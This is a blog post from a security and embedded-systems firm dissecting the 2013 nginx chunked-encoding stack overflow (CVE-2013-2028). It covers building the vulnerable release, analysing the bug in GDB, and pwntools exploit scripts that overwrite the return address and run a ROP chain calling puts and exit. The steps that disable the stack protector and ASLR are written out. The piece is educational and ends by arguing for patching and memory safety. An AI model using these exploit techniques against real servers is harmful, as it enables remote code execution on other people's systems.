Protecting devices from malicious use is often a cat-and-mouse game between security researchers identifying software vulnerabilities (CVEs) and product-makers patching them before attackers can exploit them. As a result, devices can no longer be developed, shipped and forgotten. Instead, manufacturers must commit to keeping those devices up to date and free from critical vulnerabilities for the life of the product. We often get asked to support this by identifying, triaging and patching vulnerabilities in Linux distributions. Whilst doing so we’ve often wondered, just how easy or practical is it to exploit a vulnerability (CVE)? Furthermore, as part of our involvement in UKRI’s Digital Security by Design challenge with Iceotope, we’re also keen to see how more secure Instruction Set Architectures (ISA) such as ARM’s CHERI based Morello platform, can mitigate these vulnerabilities. In this blog post we’re going to look at a published CVE and attempt to exploit it.
CVE-2013-2028
Let’s take a look at CVE-2013-2028 from 2013 which relates to the nginx HTTP web server, it’s described as follows:
“The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.”
It has a CVSS score of 7.5 (indicating it’s severity) and is a very simple example of a vulnerability which can lead to remote code execution caused by a stack-based buffer overflow. It’s also been characterised by the Common Weakness Enumeration (CWE) as CWE-787 which describes the class of vulnerability as an “Out-of-bounds Write”. This type of vulnerability would naturally be quite troubling given the potential impact and ability to exploit remotely.
Building nginx
Before we attempt to exploit this vulnerability, let’s download and build the old and vulnerable version of nginx as follows:
$ git clone --single-branch --branch release-1.4.0 git@github.com:nginx/nginx.git
$ cd nginx
$ ./auto/configure
$ make
$ sudo make install
As this version of software is more than 10 years old, and given we’re building this on a recent Ubuntu 22.04 distribution, some changes to the source are needed to avoid compilation errors due to the use of a more modern version of the compiler and system libraries. It was necessary for us to modify ngx_linux_config.h to remove an unnecessary include of <sys/sysctl.h>. It was also necessary for us to comment out a line in ngx_user.c which is no longer needed. We can now finally run nginx as follows:
$ sudo /usr/local/nginx/sbin/nginx -g "daemon off;error_log /dev/stdout debug;"
The Two Bugs that Allow a Buffer Overflow
These days, it can be trivial to exploit vulnerable software with limited knowledge of the vulnerability thanks to tools such as metasploit. However, we’d like to fully understand the vulnerability and it’s exploit. As this is a buffer-overflow vulnerability, let’s take a look at the buffer of interest in ngx_http_request_body.c.
static ngx_int_t
ngx_http_read_discarded_request_body(ngx_http_request_t *r)
{
size_t size;
ssize_t n;
ngx_int_t rc;
ngx_buf_t b;
u_char buffer[NGX_HTTP_DISCARD_BUFFER_SIZE];
$ git grep "define NGX_HTTP_DISCARD_BUFFER_SIZE"
src/http/ngx_http_request.h:#define NGX_HTTP_DISCARD_BUFFER_SIZE 4096
This is the buffer we intend to overflow, it’s declared on the stack and is of size NGX_HTTP_DISCARD_BUFFER_SIZE which is 4096 bytes. Given this isn’t a memory-safe language it’s possible to write into the buffer more data than it can hold, resulting in a buffer overflow which will overwrite whatever else comes next in the stack.
A little later into this ngx_http_read_discarded_request_body function, we can see that data is written into this buffer via a call to recv, as follows:
size = (size_t) ngx_min(r->headers_in.content_length_n, NGX_HTTP_DISCARD_BUFFER_SIZE);
n = r->connection->recv(r->connection, buffer, size);
$ git grep "define ngx_min"
src/core/ngx_core.h:#define ngx_min(val1, val2) ((val1 > val2) ? (val2) : (val1))
The recv function is used to transfer up to specified number of bytes (size) into our buffer. You’ll see that the ngx_min function is used to ensure that we don’t exceed and overflow the maximum size of the buffer – it does this by picking the smaller size between NGX_HTTP_DISCARD_BUFFER_SIZE and the amount of data available to write. Therefore it shouldn’t be possible to write beyond the end of the buffer, right?
Unfortunately there is an issue here. Let’s look at the type used for content_length_n. It’s defined as an off_t which is usually a signed integer and thus may hold a negative value. Oopsies!
$ git grep content_length_n src/http/ngx_http_request.h
src/http/ngx_http_request.h: off_t content_length_n;
src/http/ngx_http_request.h: off_t content_length_n;
So let’s examine what may happen if content_length_n holds a negative number:
size = (size_t) ngx_min(r->headers_in.content_length_n, NGX_HTTP_DISCARD_BUFFER_SIZE);
# expand out ngx_min macro (size = (size_t) ((val1 > val2) ? (val2) : (val1)))
size = (size_t) ((r->headers_in.content_length_n > NGX_HTTP_DISCARD_BUFFER_SIZE) ? (NGX_HTTP_DISCARD_BUFFER_SIZE) : (r->headers_in.content_length_n))
# substitute values for content_length_n and NGX_HTTP_DISCARD_BUFFER_SIZE
size = (size_t) ((-100 > 4096) ? (4096) : (-100))
size = (size_t) -100
# cast from off_t (signed) to size_t (unsigned)
size = 4294967196
Ouch! So when we use a negative value for content_length_n (e.g. -100), the ngx_min selects this value as it is smaller than 4096. Unfortunately, we then cast the signed integer -100 into a size_t which is unsigned, and due to the way the number is represented in bits, we end up with a large number. The problem here is that this number is larger than the buffer size. This means that if we can somehow set content_length_n to a negative number, then we can trick the recv call into writing more data into buffer than it can hold.
So, how can we get a negative number in content_length_n? This time we can take advantage of an integer overflow elsewhere in the code base. Nginx is a webserver and to talk to the world it uses the Hypertext Transfer Protocol (HTTP). A feature of this protocol is to be able to specify how data is encoded, for example it may be compressed. In order to exploit the vulnerability we need to use ‘chunked transfer encoding’, this is where data is sent in chunks without the full size being known (which may be useful for streaming large amounts of data). A typical ‘chunked’ request may look like this from the client:
GET / HTTP/1.1\lf
Host: 127.0.0.1\lf
Transfer-Encoding: chunked\cr\lf\cr\lf
4\cr\lf
data\cr\lf
9\cr\lf
more data\cr\lf
0\cr\lf
\cr\lf
Above we’re making a request from host 127.0.0.1 and sending two chunks of data. Each chunk starts with an ASCII representation of the number of size of the chunk (in octets) followed by the data. In this case we have a chunk of 4 octets with data ‘data’, then a 9 octet chunk with data ‘more data’ followed by a terminating chunk.
Nginx parses chunked requests in function ngx_http_parse_chunked of ngx_http_parse.c, a snippet of this code follows:
case sw_chunk_start:
if (ch >= '0' && ch <= '9') {
state = sw_chunk_size;
ctx->size = ch - '0';
break;
}
c = (u_char) (ch | 0x20);
if (c >= 'a' && c <= 'f') {
state = sw_chunk_size;
ctx->size = c - 'a' + 10;
break;
}
goto invalid;
case sw_chunk_size:
if (ctx->size > NGX_MAX_OFF_T_VALUE / 16) {
goto invalid;
}
if (ch >= '0' && ch <= '9') {
ctx->size = ctx->size * 16 + (ch - '0');
break;
}
c = (u_char) (ch | 0x20);
if (c >= 'a' && c <= 'f') {
ctx->size = ctx->size * 16 + (c - 'a' + 10);
break;
}
This snippet of code decodes bytes of the request, converting successive ASCII values into a size variable representing the size of the next chunk of data, and it keeps doing this until it sees a \cr\lf pair. The problem here is that malicious input, for example a string of hexadecimal characters can overflow the size variable, which is once again of signed type off_t, resulting in a negative number. The ngx_http_parse_chunked function goes on to determine how much more data is needed to be read from the network socket (ctx->length), which is based on the size value (ctx->size). ctx->length is then later assigned to content_length_n (which if you remember is the amount of data we read into buffer via the recv call) in the ngx_http_discard_request_body_filter function.
Therefore, it’s possible, and very easy, for an attacker to construct a malicious HTTP chunked request to a vulnerable nginx server – which due to an integer overflow and signed to unsigned cast – allows us to write more data into buffer than it is designed to hold. By the way, the fix for this vulnerability is in commit 4997de8005630 which looks like this:
diff --git a/src/http/ngx_http_parse.c b/src/http/ngx_http_parse.c
index 34b3b85d060d..3c168aaf25b6 100644
--- a/src/http/ngx_http_parse.c
+++ b/src/http/ngx_http_parse.c
@@ -2209,6 +2209,10 @@ data:
}
+ if (ctx->size < 0 || ctx->length < 0) {
+ goto invalid;
+ }
+
return rc;
done:
Exploiting the Buffer Overflow to Manipulate Flow of Execution
So now that we understand the vulnerability, let’s exploit it. To help understand how, let’s use GDB to examine the stack frame that holds the vulnerable buffer:
$ sudo gdb /usr/local/nginx/sbin/nginx
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04.2) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
https://www.gnu.org/software/gdb/bugs/.
Find the GDB manual and other documentation resources online at:
http://www.gnu.org/software/gdb/documentation/.
For help, type "help".
Type "apropos word" to search for commands related to "word"…
Reading symbols from /usr/local/nginx/sbin/nginx…
(gdb) set args -g "daemon off;"
(gdb) set follow-fork-mode child
(gdb) b ngx_http_read_discarded_request_body
Breakpoint 1 at 0x4064a: file src/http/ngx_http_request_body.c, line 627.
(gdb) r
Starting program: /usr/local/nginx/sbin/nginx -g "daemon off;"
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[Attaching after Thread 0x7ffff7eb6340 (LWP 1105576) fork to child process 1105579]
[New inferior 2 (process 1105579)]
[Detaching after fork from parent process 1105576]
[Inferior 1 (process 1105576) detached]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[Switching to Thread 0x7ffff7eb6340 (LWP 1105579)]
Now that nginx is running in GDB, let’s use a simple Python script to send a chunked request. Please note that we’ve based this work on pre-existing exploit code which can be found here.
from pwn import *
base_payload = """
GET / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked\r\n\r\n"""
def main():
ps = connect("127.0.0.1", "80")
ps.send(base_payload)
if name == "main":
main()
Running this script will allow us to trigger our ngx_http_read_discarded_request_body breakpoint. We can use this to examine the stack.
(gdb) info locals
size =
n =
rc =
b = {pos = 0xf , last = 0x0, file_pos = 93824993091356, file_last = 93824993097552,
start = 0x7fffffffe590 "\001", end = 0x0, tag = 0x340, file = 0x10102464c457f, shadow = 0x0, temporary = 1, memory = 1, mmap = 0, recycled = 0,
in_file = 0, flush = 0, sync = 0, last_buf = 0, last_in_chain = 0, last_shadow = 0, temp_file = 0, num = 1}
buffer = "\000\000\000\000\000\000\000\000@\000\000\000\000\000\000\000\310\003\001\000\000\000\000\000\000\000\000\000@\000\070\000\v\000@\000 \000\037\000\001\000\000\000\004", '\000' , "\350/\000\000\000\000\000\000\350/\000\000\000\000\000\000\000\020\000\000\000\000\000\000\001\000\000\000\005\000\000\000\000\060\000\000\000\000\000\000\000\060\000\000\000\000\000\000\000\060\000\000\000\000\000\000\071\222\000\000\000\000\000\000\071\222\000\000\000\000\000\000\000\020\000\000\000\000\000\000\001\000\000\000\004\000\000\000\000\320\000\000\000\000\000\000\000\320\000\000\000\000\000\000\000\320\000\000\000\000\000\000(%\000\000\000\000\000\000(%\000\000\000\000\000\000\000"…
(gdb) print sizeof(b)
$11 = 80
(gdb) print sizeof(buffer)
$12 = 4096
(gdb) print &b
$13 = (ngx_buf_t ) 0x7fffffffca20
(gdb) print &buffer
$14 = (u_char ()[4096]) 0x7fffffffca70
(gdb) print $rsp
$15 = (void *) 0x7fffffffdab8
(gdb) print *((void **) $rsp)
$16 = (void *) 0x555555596a4b
(gdb) bt
0 ngx_http_read_discarded_request_body (r=r@entry=0x555555609670) at src/http/ngx_http_request_body.c:627
1 0x0000555555596a4b in ngx_http_discard_request_body (r=r@entry=0x555555609670) at src/http/ngx_http_request_body.c:528
...
From examining the stack pointer register ($rsp) we’ve learnt that upon exiting this function, the flow of execution will jump to the location stored in 0x7fffffffdab8, this currently points to the caller of this function which is ngx_http_discard_request_body. We’ve also learnt that the vulnerable buffer spans memory between 0x7fffffffca70 and 0x7fffffffda70. As the return address is stored at a higher address than the vulnerable buffer, it means that if we write too much data into the buffer it will overflow and overwrite the return address value at 0x7fffffffdab8 – effectively manipulating the flow of control. Let’s update our exploit program as follows to do this:
from pwn import *
base_payload = """
GET / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked\r\n\r\n"""
def main():
ps = connect("127.0.0.1", "80")
payload = base_payload
payload += 'A' * (4096+962)
payload += 'B' * 72
payload += p64(0xDEADBEEFDEADBEEF).decode('latin-1')
ps.send(payload)
if name == "main":
main()
This time, in addition to sending the HTTP chunked header, we also send additional data. We start by sending lots of ‘A’ characters. The purpose of this is to trigger the chunk parsing overflow and to overflow the vulnerable buffer. The reason for the additional 962 bytes is to account for the data consumed by the ngx_http_parse_chunked handling.
From observation in GDB, we previously learnt that the return address is 72 bytes on from the end of the buffer (0x7fffffffdab8 – 0x7fffffffda70) and thus we send additional characters to consume this gap.
Finally, we write a new return address, in this case we’ve used an easily identifiable sequence of characters – 0xDEADBEEFDEADBEEF.
In theory, it should be possible to fill the buffer with machine code (or shell code as the cool kids say), rather than ‘A’s or ‘B’s, and then overwrite the return address to point to the machine code in our buffer. Thus giving us the ability to remotely execute our own code on the vulnerable machine. Unfortunately, it’s not that easy thanks to various hardening techniques employed by the compiler and C library. Let’s see what happens when we run our exploit.
$ sudo /usr/local/nginx/sbin/nginx -g "daemon off;error_log /dev/stdout debug;"
2024/12/19 00:10:29 [notice] 1124170#0: using the "epoll" event method
2024/12/19 00:10:29 [notice] 1124170#0: nginx/1.4.0
2024/12/19 00:10:29 [notice] 1124170#0: built by gcc 11.4.0 (Ubuntu 11.4.0-1ubuntu1~22.04)
2024/12/19 00:10:29 [notice] 1124170#0: OS: Linux 6.5.0-41-generic
2024/12/19 00:10:29 [notice] 1124170#0: getrlimit(RLIMIT_NOFILE): 1024:1048576
2024/12/19 00:10:29 [notice] 1124170#0: start worker processes
2024/12/19 00:10:29 [notice] 1124170#0: start worker process 1124171
2024/12/19 00:10:39 [error] 1124171#0: *1 client sent invalid chunked body, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", host: "127.0.0.1"
*** stack smashing detected ***: terminated
2024/12/19 00:10:39 [notice] 1124170#0: signal 17 (SIGCHLD) received
2024/12/19 00:10:39 [alert] 1124170#0: worker process 1124171 exited on signal 6 (core dumped)
2024/12/19 00:10:39 [notice] 1124170#0: start worker process 1124193
You’ll see that due to GCC’s ‘stack-protector‘ feature, GCC has detected that we have attempted to smash the stack. When GCC compiles code with this feature enabled, it will add a canary guard variable in the stack frame and initialise it’s value upon entering the function. When the function exits additional code is executed to verify that the value hasn’t changed. If it has changed, then the program exits. In our case the guard variable sits somewhere between the vulnerable buffer and the location of the return address. We don’t know what this value will be (it’ll be random) and so when we overflow the buffer we can’t write the correct guard value. We can see this guard variable in our stack frame:
(gdb) x/100x 0x7fffffffda50
0x7fffffffda50: 0x00000021 0x00000000 0x55609670 0x00005555
0x7fffffffda60: 0x55610d60 0x00005555 0x5560a540 0x00005555
0x7fffffffda70: 0x555cf187 0x00005555 0x25577300 0x91b88538
0x7fffffffda80: 0x5561d5d0 0x00005555 0x55609670 0x00005555
0x7fffffffda90: 0xaaaaaab0 0xaaaaaaaa 0x55629ad0 0x00005555
0x7fffffffdaa0: 0x5560e680 0x00005555 0x00000195 0x00000000
0x7fffffffdab0: 0x5561d5d0 0x00005555 0x55596ab2 0x00005555
The first two lines of the above memory dump shows the last bytes of the 4096 byte buffer. The last 8 bytes of the output represent the return address that we wish to manipulate. The 8 bytes starting at 0x7fffffffda78 represent the guard value, it’s a random value which changes on each run. For fun and without our exploit payload, we set a breakpoint in ngx_http_read_discarded_request_body, manually overwrote the guard variable after it had been initialised and saw the “stack smashing detected” error upon function exit.
It’s possible to work around the guard value through brute force. For example, it’s possible to send many requests to nginx cycling through all the possible values for this variable, if the connection is terminated then you know the guard variable is incorrect. A good example of how to do that for this vulnerability can be found here. This should also serve as a reminder for why it can be helpful to review access logs to identify such unusual behaviour. However, to simplify our exploit we’ll just turn this feature off via the “-fno-stack-protector” GCC flag.
If we attempt our exploit again, we now see the following:
2024/12/19 00:53:35 [alert] 1129073#0: worker process 1129074 exited on signal 11 (core dumped)
Which may be reasonable to expect, given that we are redirecting execution to whatever value is at 0xdeadbeefdeadbeef. Instead of this value, we could have used the address of a pre-existing function in nginx – let’s try this. By examining the nginx binary with objdump -dSx we can see the following snippet of dissassembly:
ngx_write_stderr("nginx version: " NGINX_VER NGX_LINEFEED);
ff86: 48 8d 3d aa 31 06 00 lea 0x631aa(%rip),%rdi # 73137 <_IO_stdin_used+0x137>
ff8d: e8 74 fb ff ff call fb06 <ngx_write_stderr>
This is a small snippet of code that calls the ngx_write_stderr to print out the version of nginx. We can see that the offset in the .text section of the binary is 0xff86. However, we need to identify the location of this code when it’s been relocated by the loader into memory. Given that we have GDB running we can look up the location of main in the binaries symbol table, compare that to where it’s actually located in memory to work out an offset:
(gdb) p main
$1 = {int (int, char * const *)} 0x555555563b21
$ objdump -x objs/nginx | grep " main$"
000000000000fb21 g F .text 0000000000000bc2 main
Here we see that main is in memory at 0x555555563b21 whereas it’s offset in the .text section was 0xfb21 – thus an offset of 0x555555554000. We can use this knowledge to calculate that the call to ngx_write_stderr will be at 0x555555554000 + 0xff86 = 0x555555563F86.
Let’s see what happens when we run our exploit payload with address 0x555555563F86 instead of 0xdeadbeefdeadbeef:
2024/12/19 23:28:22 [error] 1217828#0: *1 client sent invalid chunked body, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", host: "127.0.0.1"
nginx version: nginx/1.4.0
Thread 5.1 "nginx" received signal SIGSEGV, Segmentation fault.
As you can see, we successfully redirected the flow of execution to a function of our choosing. Therefore, is it possible to set the return address to execute code that we’ve placed in the vulnerable buffer? Unfortunately, once again the compiler by default will mark the stack as non-executable thus preventing this exploit (the checksec utility can be used to see the stack permissions). Though adding the “-z execstack” option to gcc would allow this.
Return Oriented Programming
Given the difficulty in executing malicious code placed on the stack, a common technique attackers use is known as return-oriented programming. Instead of writing our own code, we identify small bits of machine code that already exist in the application or it’s shared libraries that typically end in a return instruction. We can then manipulate the stack to chain these bits of code (known as gadgets) together to provide turing complete functionality. For example, if you wanted to call the C library ‘puts’ function, you could find machine code that puts values from the stack into the CPU registers (i.e. function arguments), and then call into the C library function. A more complex example would be chain multiple gadgets together, to call mprotect to enable execute permissions on shell code provided in the buffer, this shellcode could then provide a reverse shell allowing for command line access to the vulnerable machine (see this example here).
Let’s construct a simple chain of gadgets that allows us to call ‘puts’. We’ll need to pass a parameter to puts (the string we want to print), let’s look for a gadget that can do that for us. We’ll use the ROPgadget utility to list all identified gadgets in our binary, and search for one that will pop a value (from the stack) into the rdi register which is the first function parameter in the x86 calling convention.
$ ROPgadget --binary objs/nginx | grep "pop rdi ; ret"
0x000000000000fb61 : pop rdi ; ret
The output shows that this gadget is present at an offset of 0xfb61 from the start of the .text section of the binary. As before, we can use gdb to help us identify where this gadget will live in memory, as follows:
$ objdump -x objs/nginx | grep main
000000000000fb21 g F .text 0000000000000bc2 main
$ (gdb) p &main
$6 = (int (*)(int, char * const *)) 0x555555563b21 <main>
# We can see that the main function is offset by 0x555555563b21
- 0xfb21 = 0x555555554000
# Thus we can add the offset to the gadget to get its address:
# 0xfb61+0x555555554000=0x555555563B61
As show above, we can expect this ROP gadget to live at 0x555555563B61. We can use this gadget to set a value for the first parameter of the puts function which is the address of the string we want to print. We now need to identify a suitable string to print – for simplicity, let’s use a string that already exists in the binary in it’s .rodata section. We can use readelf to find this:
$ readelf -p .rodata objs/nginx | grep NGINX
[ 153] NGINX
Once again this is an offset from the start of the .rodata, lets find out where the .rodata section lives in memory via GDB:
$ (gdb) info files
0x00005555555c7000 - 0x00005555555d1f95 is .rodata
We can add the offset to the address of the start of the .rodata which gives us 0x00005555555c7153.
Now, let’s identify the location of the puts system call:
(gdb) p &puts
$6 = (int (*)(const char *)) 0x7ffff7680e50 <__GI__IO_puts>
We now have the address of a string to print, the address of a function to pass the string to, and a way to put the string in the register associated with the first parameter of the function. Let’s use this knowledge to construct a sequence of ROP gadgets, we’ll update our exploit payload:
from pwn import *
base_payload = """
GET / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked\r\n\r\n"""
def main():
ps = connect("127.0.0.1", "80")
mychain = b''
# print "NGINX" via puts
mychain += p64(0x555555563B61) # pop rdi ; ret
mychain += p64(0x5555555c7153) # offset of a string in .rodata
mychain += p64(0x7ffff7680e50) # Address of system (puts)
# print "NGINX" via puts (again)
mychain += p64(0x555555563B61) # pop rdi ; ret
mychain += p64(0x5555555c7153) # offset of a string in .rodata
mychain += p64(0x7ffff7680e50) # Address of system (puts)
# call exit with a return code of 4
mychain += p64(0x555555563B61) # pop rdi ; ret
mychain += p64(4) # exit value
mychain += p64(0x7ffff76455f0) # Address of exit library call.
payload = base_payload
payload += 'A' * (4096+962)
payload += 'B' * 136
payload += mychain.decode('latin-1')
ps.send(payload)
if name == "main":
main()
You’ll see that this time, rather than overwrite the return with the first item in our ROP chain, we instead call our ‘pop rdi’ gadget. The ‘pop rdi’ instruction will take the next value off the stack, which in our case is the next item in our chain, which is an address of a string we want to print. Once this gadget has finished it will return to the third item in our chain which is a call to the puts system call. The puts system call will look at the value in the rdi register to determine the address of the string to print. Therefore the first three values we place on the stack will result in our NGINX string being printed.
Upon printing the NGINX string, the flow of execution will move to the next item in our chain. In this case it will print the NGINX string for a second time. Finally we’ve used a ‘pop rdi’ gadget again to call the exit system call with the return value of 4. Let’s see what happens when we run this:
(gdb) r
Starting program: /usr/local/nginx/sbin/nginx -g "daemon off;error_log /dev/stdout debug;"
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
y
2024/12/20 00:18:23 [notice] 1221404#0: using the "epoll" event method
2024/12/20 00:18:23 [notice] 1221404#0: nginx/1.4.0
2024/12/20 00:18:23 [notice] 1221404#0: built by gcc 11.4.0 (Ubuntu 11.4.0-1ubuntu1~22.04)
2024/12/20 00:18:23 [notice] 1221404#0: OS: Linux 6.5.0-41-generic
2024/12/20 00:18:23 [notice] 1221404#0: getrlimit(RLIMIT_NOFILE): 1024:1048576
2024/12/20 00:18:23 [notice] 1221404#0: start worker processes
[Attaching after Thread 0x7ffff7eb6340 (LWP 1221404) fork to child process 1221405]
[New inferior 16 (process 1221405)]
[Detaching after fork from parent process 1221404]
[Inferior 15 (process 1221404) detached]
2024/12/20 00:18:23 [notice] 1221404#0: start worker process 1221405
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
NGINX
NGINX
2024/12/20 00:18:30 [notice] 1221404#0: signal 17 (SIGCHLD) received
[Inferior 16 (process 1221405) exited with code 04]
2024/12/20 00:18:30 [notice] 1221404#0: worker process 1221405 exited with code 4
(gdb) 2024/12/20 00:18:30 [notice] 1221404#0: start worker process 1221409
As you can see, we successfully used our exploit to print NGINX to the console twice and then gracefully exited with the return code of 4. Hopefully you’re beginning to see just how powerful ROP gadgets can be.
Address Space Layout Randomization
Throughout this exploit, we’ve already seen that compiler and linker features can be used to prevent exploitation. We’ve seen how the stack protector can detect stack smashing and we’ve seen how the linker can enforce access permissions to prevent code on the stack being executed. However, so far we’ve relied on hard coded values in our Python exploit code for the location of ROP gadgets. The Linux kernel provides a feature known as Address Space Layout Randomization (ASLR) which randomises the layout of code in the processes address space making it much more difficult for an attacker to create an exploit. With ASLR, the attacker has to first locate where such gadgets or library code exists. As a result of this, our exploit will only work when nginx is running under GDB – this is because GDB disables ASLR for the current process being debugged. In order for our exploit to work outside of GDB we need to disable ASLR entirely as follows:
sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"
Of course, techniques do exist to work around ASLR, these often involve discovering the addresses of gadgets through vulnerabilities that leak memory addresses. Over time, code generation tools and operating systems make such exploits more difficult through the addition of hardening features such as the ones we’ve mentioned in this blog post. Likewise, security researchers and attackers are finding ever innovative ways to overcome these hardening features.
Final Thoughts
Identifying new vulnerabilities and producing viable exploits is not a trivial task. However, it is a task being performed every day across the world, and it’s a task where the outputs are shared publicly through global databases such as NIST’s NVD database. Furthermore, due to tool kits such as metasploit, the level of skill needed to find a known vulnerability in a product and exploit it is relatively low. This is why best practice requires that software is kept up to date and patched for critical vulnerabilities.
You may have also noticed that when we updated our python exploit code to add gadgets, we also updated the amount of data that needed to be written to overwrite the return address. We needed to do this because after adding the “-fno-stack-protector” the layout of the stack changed. It’s worth pointing out that exploit code often depends heavily on how the binary was built (i.e. toolchain version, libraries version, etc) – and thus you’ll find that exploits from tool kits such as metasploit will assume you are targeting a specific packaged version of a application running on a specific distribution. It’s therefore more challenging to target an application in a distribution where the binary isn’t publicly available to examine – this may be an argument for using custom distributions such as Yocto and also a reminder that exposing information (for example memory addresses in output) can present a risk.
The blog post has also shown the importance of building binaries with security hardening features of the tool chain enabled, there is plenty of information available online for how best to do this, for example this website.
It’s been estimated that approximately 60-70% of vulnerabilities are due to memory-safety issues, such issues include writing beyond the end of a buffer, using memory after it’s been free’d and generally accessing memory you shouldn’t. However, these issues can be completely avoided by moving moving away from “memory-unsafe” languages such as C and C++ to “memory-safe” languages such as Rust, and Go – languages that have built in protection to stop or detect invalid accesses.
An alternative to memory-safe languages are experimental architectures such as Arm’s CHERI based Morello platform – these architectures effectively replace pointers with capabilities which encode bounds and permissions – thus removing the burden of protection from software to hardware. In a future blog post we plan to explore the impact of CHERI on CVEs such as the one we’ve examined today.